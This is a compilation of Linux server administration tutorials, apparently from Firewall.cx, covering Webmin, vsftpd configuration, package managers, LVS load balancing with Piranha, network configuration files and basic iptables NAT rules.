If you want to schedule your Backups go to the next tab “Scheduled Backups” and select the “Add a new scheduled backup”, since, as shown, no scheduled backup has been defined yet:

linux-webmin-26

 

linux-webmin-27

And set the exact backup schedule options. The information is nearly same as that for the Backup Now. However, now you have the choice for setting the options for the schedule, such as Months, Weekdays, Days, Hours, Minutes and Seconds.

linux-webmin-28

 Restoration of modules can be selected from the “Restore Now” tab:

linux-webmin-29

The options for restore now follow the same pattern as for the backup. You have the options for restoring from a local file, an FTP server, an SSH server, and an uploaded file. Apart from providing the username and passwords for the servers, you have the option of only viewing what is going to be restored, without applying the changes.

Configuring CRON Jobs With Webmin

Selecting the “Scheduled Cron Jobs” under “System” will allow creation, deletion, disabling and enabling of Cron jobs, as well as controlling user access to cron jobs. The interface also shows the users who are active and their current cron-jobs. The jobs can be selectively deleted, disabled or enabled (if disabled earlier).

linux-webmin-30

For creating a new cron job and scheduling it, select the tab “Create a new scheduled cron job”. You have the options of setting the Months, Weekdays, Days, Hours, Minutes. You have the option of running the job on any date, or running it only between two fixed dates:

linux-webmin-31

For controlling access to Cron jobs, select the next tab “Control User Access to Cron Jobs” in the main menu:

linux-webmin-32

Configuring SSH Server With Webmin

Selecting “SSH Server” under “Servers” will allow all configuration of the SSH Server:

linux-webmin-33

Access Control is provided by selecting the option "Access Control" from the main menu :

linux-webmin-34

Miscellaneous options are available when the "Miscellaneous Options" is selected from the main menu:

linux-webmin-35

The SSH config files can be accessed directly and edited by selecting “Edit Config Files” from the main menu.

linux-webmin-36

Configuring Squid Proxy Server

Select “Squid Proxy Server” under “Servers”. The main menu shows what all can be controlled there:

linux-webmin-37

The Access Control allows ACL, Proxy restrictions, ICP restrictions, External ACL programs, and Reply proxy restrictions, when you select “Access Control”:

linux-webmin-38

 

linux-webmin-39

Configuring Apache HTTP Server

You can configure “Apache Webserver” under “Servers”. The main menu shows what you can configure there.

All Global configuration can be done from the first tab:

linux-webmin-40

You can also configure the existing virtual hosts or create a virtual host, if you select the other tabs:

linux-webmin-41

Users and Groups who are allowed to run Apache are mentioned here (select from the main menu):

linux-webmin-42

Apache configuration files can be directly edited from the main menu.

All the configuration files, httpd.conf, sarg.conf, squid.conf, and welcome.conf can be directly edited from this interface:

linux-webmin-43

Any other service or application, which you are not able to locate directly from the index on the left, can be searched by entering in the search box on the left. If the item searched is not installed, Webmin will offer to download the RPM and install it. A corresponding entry will appear in the index on the left and you can proceed to configure the service or application. After installing an application or service, modules can be refreshed as well. From the Webmin interface, you can also view the module's logs.

  • Hits: 107413

Installing & Configuring VSFTPD FTP Server for Redhat Enterprise Linux, CentOS & Fedora

Vsftpd is a popular FTP server for Unix/Linux systems. For thoes unaware of the vsftpd ftp server, note that this is not just another ftp server, but a mature product that has been around for over 12 years in the Unix world. While Vsftpd it is found as an installation option on many Linux distributions, it is not often Linux system administrators are seeking for installation and configuration instructions for it, which is the reason we decide to cover it on Firewall.cx.

This article focuses on the installation and setup of the Vsftpd service on Linux Redhat Enterprise, Fedora and CentOS, however it is applicable to almost all other Linux distributions.  We'll also take a look at a number of great tips which include setting quotas, restricting access to anonymous users, disabling uploads, setting a dedicated partition for the FTP service, configuring the system's IPTable firewall and much more.

VSFTPD Features

Following is a list of vsftpd's features which confirms this small FTP package is capable of delivering a lot more than most FTP servers out there:

  • Virtual IP configurations
  • Virtual users
  • Standalone or inetd operation
  • Powerful per-user configurability
  • Bandwidth throttling
  • Per-source-IP configurability
  • Per-source-IP limits
  • IPv6
  • Encryption support through SSL integration
  • and much more....!

Installing The VSFTPD Linux Server

To initiate the installation of the vsftpd package, simply open your CLI prompt and use the yum command (you need root privileges) as shown below:

# yum install vsftpd

Yum will automatically locate, download and install the latest vsftpd version.

Configure VSFTPD Server

To open the configuration file, type:

# vi /etc/vsftpd/vsftpd.conf

Turn off standard ftpd xferlog log format and turn on verbose vsftpd log format by making the following changes in the vsftpd.conf file:

xferlog_std_format=NO
log_ftp_protocol=YES
Note: the default vsftpd log file is /var/log/vsftpd.log.

Above two directives will enable logging of all FTP transactions.

To lock down users to their home directories:

chroot_local_user=YES

You can create warning banners for all FTP users, by defining the path:

banner_file=/etc/vsftpd/issue

Now you can create the /etc/vsftpd/issue file with a message compliant with the local site policy or a legal disclaimer:

“NOTICE TO USERS - Use of this system constitutes consent to security monitoring and testing. All activity is logged with your host name and IP address”.

Turn On VFSTPD Service

Turn on vsftpd on boot:

# systemctl enable vsftpd@.service

Start the service:

# systemctl start This email address is being protected from spambots. You need JavaScript enabled to view it.

You can verify the service is running and listening on the correct port using the following command:

# netstat -tulpn | grep :21

Here's the expected output:

tcp   0  0 0.0.0.0:21  0.0.0.0:*   LISTEN   LISTEN 9734/vsftpd

Configure IPtables To Protect The FTP Server

In case IPTables are configured on the system, it will be necessary to edit the iptables file and open the ports used by FTP to ensure the service's operation.

To open file /etc/sysconfig/iptables, enter:

# vi /etc/sysconfig/iptables

Add the following lines, ensuring that they appear before the final LOG and DROP lines for the RH-Firewall-1-INPUT:

-A RH-Firewall-1-INPUT -m state --state NEW -p tcp --dport 21 -j ACCEPT

Next, open file /etc/sysconfig/iptables-config, and enter:

# vi /etc/sysconfig/iptables-config

Ensure that the space-separated list of modules contains the FTP connection-tracking module:

IPTABLES_MODULES="ip_conntrack_ftp"

Save and close the file and finally restart the firewall using the following commands:

# systemctl restart iptables.service
# systemctl restart ip6tables.service

Tip: View FTP Log File

Type the following command:

# tail -f /var/log/vsftpd.log

Tip: Restricting Access to Anonymous User Only

Edit the vsftpd configuration file /etc/vsftpd/vsftpd.conf and add the following:

local_enable=NO

Tip: To Disable FTP Uploads

Edit the vsftpd configuration file /etc/vsftpd/vsftpd.conf and add the following:

write_enable=NO

Tip: To Enable Disk Quota

Disk quota must be enabled to prevent users from filling a disk used by FTP upload services. Edit the vsftpd configuration file. Add or correct the following configuration options to represents a directory which vsftpd will try to change into after an anonymous login:

anon_root=/ftp/ftp/pub

The ftp users are the same users as those on the hosting machine.

You could have a separate group for ftp users, to help keep their privileges down (for example 'anonftpusers'). Knowing that, your script should do:

useradd -d /www/htdocs/hosted/bob -g anonftpusers -s /sbin/nologin bob
echo bobspassword | passwd --stdin bob
echo bob >> /etc/vsftpd/user_list

Be extremely careful with your scripts, as they will have to be run as root.

However, for this to work you will have to have the following options enabled in /etc/vsftpd/vsftpd.conf

userlist_enable=YES
userlist_deny=NO

Security Tip: Place The FTP Directory On Its Own Partition

Separation of the operating system files from FTP users files may result into a better and secure system. Restricting the growth of certain file systems is possible using various techniques. For example, use /ftp partition to store all ftp home directories and mount ftp with nosuid, nodev and noexec options. A sample /etc/fstab entry:

/dev/sda5  /ftp  ext3  defaults,nosuid,nodev,noexec,usrquota 1 2

Example File For vsftpd.conf

Following is an example for vsftpd.conf. It allows the users listed in the user_list file to log in, no anonymous users, and quite tight restrictions on what users can do:

# Allow anonymous FTP?
anonymous_enable=NO
#
# Allow local users to log in?
local_enable=YES
#
# Allow any form of FTP write command.
write_enable=YES
#
# To make files uploaded by your users writable by only
# themselves, but readable by everyone and if, through some
# misconfiguration, an anonymous user manages to upload a file, # the file will have no read, write or execute permission. Just to be # safe. 
local_umask=0000
file_open_mode=0644
anon_umask=0777
#
# Allow the anonymous FTP user to upload files?
anon_upload_enable=NO
#
# Activate directory messages - messages given to remote users when they
# go into a certain directory.
dirmessage_enable=NO
#
# Activate logging of uploads/downloads?
xferlog_enable=YES
#
# Make sure PORT transfer connections originate from port 20 (ftp-data)?
connect_from_port_20=YES
#
# Log file in standard ftpd xferlog format?
xferlog_std_format=NO
#
# User for vsftpd to run as?
nopriv_user=vsftpd
#
# Login banner string:
ftpd_banner= NOTICE TO USERS - Use of this system constitutes consent to security monitoring and testing. All activity is logged with your host name and IP address.
#
# chroot local users (only allow users to see their directory)?
chroot_local_user=YES
#
# PAM service name?
pam_service_name=vsftpd
#
# Enable user_list (see next option)?
userlist_enable=YES
#
# Should the user_list file specify users to deny(=YES) or to allow(=NO)
userlist_deny=NO
#
# Standalone (not run through xinetd) listen mode?
listen=YES
#
#
tcp_wrappers=NO
#
# Log all ftp actions (not just transfers)?
log_ftp_protocol=YES
# Initially YES for trouble shooting, later change to NO
#
# Show file ownership as ftp:ftp instead of real users?
hide_ids=YES
#
# Allow ftp users to change permissions of files?
chmod_enable=NO
#
# Use local time?
use_localtime=YES
#
# List of raw FTP commands, which are allowed (some commands may be a security hazard):
cmds_allowed=ABOR,QUIT,LIST,PASV,RETR,CWD,STOR,TYPE,PWD,SIZE,NLST,PORT,SYST,PRET,MDTM,DEL,MKD,RMD

With this config, uploaded files are not readable or executable by anyone, so the server is acting as a 'dropbox'. Change the file_open_modeoption to change that.

Lastly, it is also advised to have a look at 'man vsftpd.conf' for a full list and description of all options.

  • Hits: 186106

Updating Your Linux Server - How to Update Linux Workstations and Operating Systems

Like any other software, an operating system needs to be updated. Updates are required not only because of the new hardware coming into the market, but also for improving the overall performance and taking care of security issues.

Updates are usually done in two distinct ways. One is called the incremental update, and the other is the major update. In the incremental updates, components of the operating system undergo minor modifications. Such modifications are usually informed to users over the net. Users can download and install the modifications serially using the update managing software.

However, some major modifications require so many changes involving several packages simultaneously, it becomes rather complicated to accomplish serially over the net. This type of modification is best done by a fresh installation, after acquiring the improved version of the operating system.

Package management is one of the most distinctive features distinguishing major Linux distributions. Major projects offer a graphical user interface where users can select a package and install it with a mouse click. These programs are front-ends to the low-level utilities to manage the tasks associated with installing packages on a Linux system. Although many desktop Linux users feel comfortable installing packages through these GUI tools, the command-line package management offers two excellent features not available in any graphical package management utility, and that is power and speed.

The Linux world is sharply divided into three major groups, each swearing by the type of package management they use - the “RPM” group, the “DEB” group and the “Slackware” group. There are other fragment groups using different package management types, but they are insignificantly minor in comparison. Among the three groups, RPM and DEB are by far the most popular and several other groups have been derived from them. Some of the Linux distributions that handle these package managements are:

RPM - RedHat Enterprise/Fedora/CentOS/OpenSUSE/Mandriva, etc.

DEB - Debian/Ubuntu/Mint/Knoppix, etc.

RPM - RedHat Package Manager

Although RPM was originally used by RedHat, this package management is handled by different types of package management tools specific to each Linux distribution. While OpenSUSE uses the “zypp” package management utility, RedHat Enterprise Linux (REL), Fedora and CentOS use “yum”, and Mandriva and Mageia use “urpmi”.

Therefore, if you are an OpenSUSE user, you will use the following commands:

For updating your package list: zypper refresh

For upgrading your system: zypper update

For installing new software pkg: zypper install pkg (from package repository)

For installing new software pkg: zypper install pkg  (from package file)

For updating existing software pkg: zypper update -t package pkg

For removing unwanted software pkg: zypper remove pkg

For listing installed packages: zypper search -ls

For searching by file name: zypper wp file

For searching by pattern: zypper search -t pattern pattern

For searching by package name pkg: zypper search pkg

For listing repositories: zypper repos

For adding a repository: zypper addrepo pathname

For removing a repository: zypper removerepo name

 

If you are a Fedora or CentOS user, you will be using the following commands:

For updating your package list: yum check-update

For upgrading your system: yum update

For installing new software pkg: yum install pkg (from package repository)

For installing new software pkg: yum localinstall pkg (from package file)

For updating existing software pkg: yum update pkg

For removing unwanted software pkg: yum erase pkg

For listing installed packages: rpm -qa

For searching by file name: yum provides file

For searching by pattern: yum search pattern

For searching by package name pkg: yum list pkg

For listing repositories: yum repolist

For adding a repository: (add repo to /etc/yum.repos.d/)

For removing a repository: (remove repo from /etc/yum.repos.d/)

 

You may be a Mandriva or Mageia user, in which case, the commands you will use will be:

For updating your package list: urpmi update -a

For upgrading your system: urpmi --auto-select

For installing new software pkg: urpmi pkg (from package repository)

For installing new software pkg: urpmi pkg (from package file)

For updating existing software pkg: urpmi pkg

For removing unwanted software pkg: urpme pkg

For listing installed packages: rpm -qa

For searching by file name: urpmf file

For searching by pattern: urpmq --fuzzy pattern

For searching by package name pkg: urpmq pkg

For listing repositories: urpmq --list-media

For adding a repository: urpmi.addmedia name path

For removing a repository: urpmi.removemedia media

DEB - Debian Package Manager

Debian Package Manager was introduced by Debian and later adopted by all derivatives of Debian - Ubuntu, Mint, Knoppix, etc. This is a relatively simple and standardized set of tools, working across all the Debian derivatives. Therefore, if you use any of the distributions managed by the DEB package manager, you will be using the following commands:

For updating your package list: apt-get update

For upgrading your system: apt-get upgrade

For installing new software pkg: apt-get install pkg (from package repository)

For installing new software pkg: dpkg -i pkg (from package file)

For updating existing software pkg: apt-get install pkg

For removing unwanted software pkg: apt-get remove pkg

For listing installed package: dpkg -l

For searching by file name: apt-file search path

For searching by pattern: apt-cache search pattern

For searching by package name pkg: apt-cache search pkg

For listing repositories: cat /etc/apt/sources.list

For adding a repository: (edit /etc/apt/sources.list)

For removing a repository: (edit /etc/apt/sources.list)

  • Hits: 39942

Implementing Virtual Servers and Load Balancing Cluster System with Linux

What is Server Virtualization?

Server virtualization is the process of apportioning a physical server into several smaller virtual servers. During server virtualization, the resources of the server itself remain hidden. In fact, the resources are masked from users, and software is used for dividing the physical server into multiple virtual machines or environments, called virtual or private servers.

This technology is commonly used in Web servers. Virtual Web servers provide a very simple and popular way of offering low-cost web hosting services. Instead of using a separate computer for each server, dozens of virtual servers can co-exist on the same computer.

There are many benefits of server virtualization. For example, it allows each virtual server to run its own operating system. Each virtual server can be independently rebooted without disturbing the others. Because several servers run on the same hardware, less hardware is required for server virtualization, which saves a lot of money for the business. Since the process utilizes resources to the fullest, it saves on operational costs. Using a lower number of physical servers also reduces hardware maintenance.

In most cases, the customer does not observe any performance deficit and each web site behaves as if it is being served by a dedicated server. However, the resources of the computer being shared, if a large number of virtual servers reside on the same computer, or if one of the virtual servers starts to hog the resources, Web pages will be delivered more slowly.

There are several ways of creating virtual servers, with the most common being virtual machines, operating system-level virtualization, and paravirtual machines.

How Are Virtual Servers Helpful

The way Internet is exploding with information, it is playing an increasingly important role in our lives. Internet traffic is increasing dramatically, and has been growing at an annual rate of nearly 100%. The workload on the servers is simultaneously increasing significantly so that servers frequently become overloaded for short durations, especially for popular web sites.

To overcome the overloading problem of the servers, there are two solutions. You could have a single server solution, such as upgrading the server to a higher performance server. However, as requests increase, it will soon be overloaded, so that it has to be upgraded repeatedly. The upgrading process is complex and the cost is high.

The other is the multiple server solution, such as building a scalable network service system on a cluster of servers. As load increases, you can just add a new server or several new servers into the cluster to meet the increasing requests, and a virtual server running on commodity hardware offers the lowest cost to performance ratio. Therefore, for network services, the virtual server is a highly scalable and more cost-effective for building server cluster system.

Virtual Servers with Linux

Highly available server solutions are done by clustering. Cluster computing involves three distinct branches, of which two are addressed by RHEL or Red Hat Enterprise Linux:

Ø    Load balancing clusters using Linux Virtual Servers as specialized routing machines to dispatch traffic to a pool of servers.

Ø    Highly available or HA Clustering with Red Hat Cluster Manager that uses multiple machines to add an extra level of reliability for a group of services.

Load Balancing Cluster System Using RHEL Virtual Servers

When you access a website or a database application, you do not know if you are accessing a single server or a group of servers. To you, the Linux Virtual Server or LVS cluster appears as a single server. In reality, there is a cluster of two or more servers behind a pair or redundant LVS routers. These routers distribute the client requests evenly throughout the cluster system.

Administrators use Red Hat Enterprise Linux and commodity hardware to address availability requirements, and to create consistent and continuous access to all hosted services.

In its simplest form, an LVS cluster consists of two layers. In the first layer are two similarly configured cluster members, which are Linux machines. One of these machines is the LVS router and is configured to direct the requests from the internet to the servers. The LVS router balances the load on the real servers, which form the second layer. The real servers provide the critical services to the end-user. The second Linux machine acts as a monitor to the active router and assumes its role in the event of a failure.

The active router directs traffic from the internet to the real servers by making use of Network Address Translation or NAT. The real servers are connected to a dedicated network segment transfer all public traffic via the active LVS router. The outside world sees this entire cluster arrangement as a single entity.

LVS with NAT Routing

The active LVS router has two Network Interface Cards or NICs. One of the NICs is connected to the Internet and has a real IP address on the eth0 and a floating IP address aliased to eth0:1. The other NIC connects to the private network with a real IP address on the eth1, and a floating address aliased to eth1:1.

All the servers of the cluster are located on the private network and use the floating IP for the NAT router. They communicate with the active LVS router via the floating IP as their default route. This ensures their abilities for responding to requests from the inernet are not impaired.

When requests are received by the active LVS router, it routes the request to an appropriate server. The real server processes the request and returns the packets to the LVS router. Using NAT, the LVS router then replaces the address of the real server in the packets with the public IP address of the LVS router. This process is called IP Masquerading, and it hides the IP addresses of the real servers from the requesting clients.

Configuring LVS Routers with the Piranha Configuration Tool

The configuration file for an LVS cluster follows strict formatting rules. To prevent server failures because of syntax errors in the file lvs.cf, using the Piranha Configuration Tool is highly recommended. This tool provides a structured approach to creating the necessary configuration file for a Piranha cluster. The configuration file is located at /etc/sysconfig/ha/lvs.cf, and the configuration can be done with a web-based tool such as the Apache HTTP Server.

As an example, we will use the following settings:

LVS Router 1: eth0: 192.168.26.201

LVS Router 2: eth0: 192.168.26.202

Real Server 1: eth0: 192.168.26.211

Real Server 2: eth0: 192.168.26.212

VIP: 192.168.26.200

Gateway: 192.168.26.1

You will need to install piranha and ipvsadm packages on the LVS Routers:

# yum install ipvsadm

# yum install piranha

Start services on the LVS Routers with:

# chkconfig pulse on

# chkconfig piranha-gui on

# chkconfig httpd on

Set a Password for the Piranha Configuration Tool using the following commands: 

# piranha-passwd

Next, turn on Packet Forwarding on the LVS Routers with:

# echo 1 > /proc/sys/net/ipv4/ip_forward

Starting the Piranha Configuration Tool Service

First you'll need to modify the mode SELinux in permissive mode with the use of the command:

# setenforce 0

# service httpd start

# service piranha-gui start

If this is not done, the system will most probably show the following error massage when the piranha-gui service is started:

Starting piranha-gui: (13)Permission denied: make_sock: could not bind to address [::]:3636

(13)Permission denied: make_sock: could not bind to address 0.0.0.0:3636
No listening sockets available, shutting down
Unable to open logs

Configure the LVS Routers with the Piranha Configuration Tool

The Piranha Configuration Tool runs on port 3636 by default. Open http://localhost:3626 or http://192.168.26.201:3636 in a Web browser to access the Piranha Configuration Tool. Click on the Login button and enter piranha for the Username and the administrative password you created, in the Password field:

linux-virtual-servers-1

Click on the GLOBAL SETTINGS panel, enter the primary server public IP, and click the ACCEPT button:

linux-virtual-servers-2

 Click on the REDUNDANCY panel, enter the redundant server public IP, and click the ACCEPT button:

linux-virtual-servers-3

 Click on the VIRTUAL SERVERS panel, add a server, edit it, and activate it:

linux-virtual-servers-4

linux-virtual-servers-5

Clicking on the REAL SERVER subsection link at the top of the panel displays the EDIT REAL SERVER subsection. Click the ADD button to add new servers, edit them and activate them:

linux-virtual-servers-6

Copy the lvs.cf file to another LVS router:

# scp /etc/sysconfig/ha/lvs.cf This email address is being protected from spambots. You need JavaScript enabled to view it.:/etc/sysconfig/ha/lvs.cf

Start the pulse services on the LVS Routers with the following command:

# service pulse restart

Testing the System

You can use the Apache HTTP server benchmarking tool (ab) to simulate a visit by the user.

HA Clustering With Red Hat Cluster Manager

When dealing with clusters, single point failures, unresponsive applications and nodes are some of the issues that increase the non-availability of the servers. Red Hat addresses these issues through their High Availability or HA Add-On servers. Centralised configurations and management are some of the best features of the Conga application of RHEL.

For delivering an extremely mature, high-performing, secure and lightweight high-availability server solution, RHEL implements the Totem Single Ring Ordering and Membership Protocol. Corosync is the cluster executive within the HA Add-On.

Kernel-based Virtual Machine Technology

RHEL uses the Linux kernel that has the virtualization characteristics built-in and makes use of the kernel-based virtual machine technology known as KVM. This makes RHEL perfectly suitable to run as either a host or a guest in any Enterprise Linux deployment. As a result, all Red Hat Enterprise Linux system management and security tools and certifications are part of the kernel and always available to the administrators, out of the box.

RHEL uses highly improved SCSI-3 PR reservations-based fencing. Fencing is the process for removing resources from the cluster node from being accessed when they have lost contact with the cluster. This prevents uncoordinated modification of shared storage thus protecting the resources.

Improvement in system flexibility and configuration is possible because RHEL allows manual specification of devices and keys for reservation and registration. Ordinarily, after fencing, the unconnected cluster mode would need to be rebooted to rejoin the cluster. RHEL unfencing makes it possible to re-enable access and startup of the node without administrative intervention.

Improved Cluster Configuration

LDAP, the Lightweight Directory Access Protocol provides improved cluster configuration system for load options. This provides better manageability and usability across the cluster by easily configuring, validating and synchronizing the reload. Virtualized KVM guests can be run as managed services.

RHEL Web interface to the cluster management and administration runs on TurboGears2 and provides a rich graphical user interface. This enables unified logging and debugging by administrators who can enable, capture and read cluster system logs using a single cluster configuration command.

Installing TurboGears2

The method of installing TurboGears2 depends on the platform and the level of experience. It is recommended to install TurboGears2 withing a virtual enviroment as this will prevent interference with the system's installed packages. Prerequisites for installation of TurboGears2 are Python, Setuptools, Database and Drivers, Virtualenv, Virtualenvwrapper and other dependencies.

linux-virtual-servers-7

  • Hits: 37444

Working with Linux TCP/IP Network Configuration Files

This article covers the main TCP/IP network configuration files used by Linux to configure various network services of the system such as IP Address, Default Gateway, Name servers - DNS, hostname and much more.  Any Linux Administrator must be well aware where these services are configured and to use them. The good news is that most of the information provided on this article apply's to Redhat Fedora, Enterprise Linux, CentOS, Ubunto and other similar Linux distributions.

On most Linux systems, you can access the TCP/IP connection details within 'X Windows' from Applications > Others > Network Connections. The same may also be reached through Application > System Settings > Network > Configure. This opens up a window, which offers configuration of IP parameters for wired, wireless, mobile broadband, VPN and DSL connections:

linux-tcpip-config-1

The values entered here modify the files:

           /etc/sysconfig/network-scripts/ifcfg-eth0

           /etc/sysconfig/networking/devices/ifcfg-eth0

           /etc/resolv.conf

           /etc/hosts

The static host IP assignment is saved in /etc/hosts

The DNS server assignments are saved in the /etc/resolv.conf

IP assignments for all the devices found on the system are saved in the ifcfg-<interface> files mentioned above.

If you want to see all the IP assignments, you can run the command for interface configuration:

# ifconfig

Following is the output of the above command:

[root@gateway ~]# ifconfig

eth0    Link encap:Ethernet  HWaddr 00:0C:29:AB:21:3E
          inet addr:192.168.1.18  Bcast:192.168.1.255  Mask:255.255.255.0
          inet6 addr: fe80::20c:29ff:feab:213e/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:1550249 errors:0 dropped:0 overruns:0 frame:0
          TX packets:1401847 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:167592321 (159.8 MiB)  TX bytes:140584392 (134.0 MiB)
          Interrupt:19 Base address:0x2000

lo        Link encap:Local Loopback 
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:71833 errors:0 dropped:0 overruns:0 frame:0
          TX packets:71833 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:12205495 (11.6 MiB)  TX bytes:12205495 (11.6 MiB)

The command ifconfig is used to configure a network interface. It can be used to set up the interface parameters that are used at boot time. If no arguments are given, the command ifconfig displays the status of the currently active interfaces. If you want to see the status of all interfaces, including those that are currently down, you can use the argument -a, as shown below:

# ifconfig -a

Fedora, Redhat Enterprise Linux, CentOS and other similar distributions supports user profiles as well, with different network settings for each user. The user profile and its parameters are set by the network-configuration tools. The relevant system files are placed in:

/etc/sysconfig/netwroking/profiles/profilename/

After boot-up, to switch to a specific profile you have to access a graphical tool, which will allow you to select from among the available profiles. You will have to run:

$ system-config-network

Or for activating the profile from the command line -

$ system-config-network-cmd -p <profilename> --activate

The Basic Commands for Networking

The basic commands used in Linux are common to every distro:

ifconfig - Configures and displays the IP parameters of a network interface

route - Used to set static routes and view the routing table

hostname - Necessary for viewing and setting the hostname of the system

netstat - Flexible command for viewing information about network statistics, current connections, listening ports

arp - Shows and manages the arp table

mii-tool - Used to set the interface parameters at data link layer (half/full duplex, interface speed, autonegotiation, etc.)

Many distro are now including the iproute2 tools with enhanced routing and networking tools:

ip - Multi-purpose command for viewing and setting TCP/IP parameters and routes.

tc - Traffic control command, used  for classifying, prioritizing, sharing, and limiting both inbound and outbound traffic.

Types of Network Interface

LO (local loop back interface). Local loopback interface is recognized only internal to the computer, the IP address is usually 127.0.0.1 or 127.0.0.2.

Ethernet cards are used to connect to the world external to the computer, usually named eth0, eth1, eth2 and so on.

Network interface files holding the configuration of LO and ethernet are:

           /etc/sysconfig/nework-scripts/ifcfg-lo

           /etc/sysconfig/nework-scripts/ifcfg-eth0

To see the contents of the files use the command:

# less /etc/sysconfig/network-scripts/ifcfg-lo

Which results in:

DEVICE=lo
IPADDR=127.0.0.1
NETMASK=255.0.0.0
NETWORK=127.0.0.0
# If you're having problems with gated making 127.0.0.0/8 a martian,
# you can change this to something else (255.255.255.255, for example)
BROADCAST=127.255.255.255
ONBOOT=yes
NAME=loopback

And the following:

# less /etc/sysconfig/network-scripts/ifcfg-eth0

Which gives the following results:

DEVICE="eth0"
NM_CONTROLLED="yes"
ONBOOT=yes
HWADDR=00:0C:29:52:A3:DB
TYPE=Ethernet
BOOTPROTO=none
IPADDR=192.168.1.18
PREFIX=24
GATEWAY=192.168.1.11
DNS1=8.8.8.8
DEFROUTE=yes
IPV4_FAILURE_FATAL=yes
IPV6INIT=no
NAME="System eth0"
UUID=5fb06bd0-0bb0-7ffb-45f1-d6edd65f3e03

 

Start and Stop the Network Interface Card

The ifconfig command can be used to start and stop network interface cards:

# ifconfig eth0 up
# ifconfig eth0 down

The ifup & ifdown command can also be used to start and stop network interface cards:

# ifup eth0
# ifdown eth0

The systemctl commands can also be used to enable, start, stop, restart and check the status of the network interface services -

# systemctl enable network.service
# systemctl start network.service
# systemctl stop network.service
# systemctl restart network.service
# systemctl status network.service

Displaying & Changing your System's Hostname

The command hostname displays the current hostname of the computer, which is 'Gateway':

# hostname
Gateway

You can change the hostname by giving the new name at the end of the command -

# hostname Firewall-cx

This will change to the new hostname once you have logged out and logged in again. In fact, for any change in the interfaces, the change is implemented only after the user logs in the next time after a log-out.

This concludes our Linux Network Configuration article.



  • Hits: 129460

Configuring Linux to Act as a Firewall - Linux IPTables Basics

What exactly is a firewall? As in the non-computer world, a firewall acts as a physical barrier to prevent fires from spreading. In the computer world too, the firewall acts in a similar manner, only the fires that they prevent from spreading are the attacks, which crackers generate when the computer is on the Internet. Therefore, a firewall can also be called a packet filter, which sits between the computer and the Internet, controlling and regulating the information flow.

Most of the firewalls in use today are the filtering firewalls. They sit between the computer and the Internet and limit access to only specific computers on the network. It can also be programmed to limit the type of communication, and selectively permit or deny several Internet services.

Organizations receive their routable IP addresses from their ISPs. However, the number of IP addresses given is limited. Therefore, alternate ways of sharing the Internet services have to be found without every node on the LAN getting a public IP address. This is done commonly by using private IP addresses, so that all nodes are able to access properly both external and internal network services.

Firewalls are used for receiving incoming transmissions from the Internet and routing the packets to the intended nodes on the LAN. Similarly, firewalls are also used for routing outgoing requests from a node on the LAN to the remote Internet service.

This method of forwarding the network traffic may prove to be dangerous, when modern cracking tools can spoof the internal IP addresses and allow the remote attacker to act as a node on the LAN. In order to prevent this, the iptables provide routing and forwarding policies, which can be implemented for preventing abnormal usage of networking resources. For example, the FORWARD chain lets the administrator control where the packets are routed within a LAN.

LAN nodes can communicate with each other, and they can accept the forwarded packets from the  firewall, with their internal IP addresses. However, this does not give them the facility to communicate to the external world and to the Internet.

For allowing the LAN nodes that have private IP addresses to communicate with the outside world, the firewall has to be configured for IP masquerading. The requests that LAN nodes make, are then masked with the IP addresses of the firewall’s external device, such as eth0.

How IPtables Can Be Used To Configure Your Firewall

Whenever a packet arrives at the firewall, it will be either processed or disregarded. The disregarded packets would normally be those, which are malformed in some way or are invalid in some technical way. Based on the packet activity of those that are processed, the packets are enqueued in one of the three builtin ‘tables.’ The first table is the mangle table. This alters the service bits in the TCP header. The second table is the filter queue, which takes care of the actual filtering of the packets. This consists of three chains, and you can place your firewall policy rules in these chains (shown in the diagram below):

- Forward chain: It filters the packets to be forwarded to networks protected by the firewall.

- Input chain: It filters the packets arriving at the firewall.

- Output chain: It filters the packets leaving the firewall.

The third table is the NAT table. This is where the Network Address Translation or NAT is performed. There are two built-in chains in this:

- Pre-routing chain: It NATs the packets whose destination address needs to be changed.

- Post-routing chain: It NATs the packets whose source address needs to be changed.

Whenever a rule is set, the table it belongs has to be specified. The ‘Filter’ table is the only exception. This is because most of the 'iptables’ rules are the filter rules. Therefore, the filter table is the default table.

The diagram below shows the flow of packets within the filter table. Packets entering the Linux system follow a specific logical path and decisions are made backed on their characteristics.  The path shown below is independent of the network interface they are entering or exiting:

The Filter Queue Table

linux-ip-filter-table

Each of the chains filters data packets based on:

  • Source and Destination IP Address
  • Source and Destination Port number
  • Network interface (eth0, eth1 etc)
  • State of the packet 

Target for the rule: ACCEPT, DROP, REJECT, QUEUE, RETURN and LOG

As mentioned previously, the table of NAT rules consists mainly of two chains: each rule is examined in order until one matches. The two chains are called PREROUTING (for Destination NAT, as packets first come in), and POSTROUTING (for Source NAT, as packets leave).

The NAT Table

linux-nat-table

At each of the points above, when a packet passes we look up what connection it is associated with. If it's a new connection, we look up the corresponding chain in the NAT table to see what to do with it. The answer it gives will apply to all future packets on that connection.

The most important option here is the table selection option, `-t'. For all NAT operations, you will want to use `-t nat' for the NAT table. The second most important option to use is `-A' to append a new rule at the end of the chain (e.g. `-A POSTROUTING'), or `-I' to insert one at the beginning (e.g. `-I PREROUTING').

The following command enables NAT for all outgoing packets. Eth0 is our WAN interface:

# iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

 If you rather implement static NAT, mapping an internal host to a public IP, here's what the command would look like:

# iptables -A POSTROUTING -t nat -s 192.168.0.3 -o eth0 -d 0/0 -j SNAT --to 203.18.45.12

With the above command, all outgoing packets sent from internal IP 192.168.0.3 are mapped to external IP 203.18.45.12.

Taking it the other way around, the command below is used to enable port forwarding from the WAN interface, to an internal host. Any incoming packets on our external interface (eth0) with a destination port (dport) of 80, are forwarded to an internal host (192.168.0.5), port 80:

# iptables -t nat -A PREROUTING -p tcp -i eth0 --dport 80 -j DNAT --to 192.168.0.5:80

How The FORWARD Chain Allows Packet Forwarding

Packet forwarding within a LAN is controlled by the FORWARD chain in the iptables firewall. If the firewall is assigned an internal IP address eth2 and an external IP address on eth0,  the rules to be used to allow the forwarding to be done for the entire LAN would be:

# iptables -A FORWARD -i eth2 -j ACCEPT
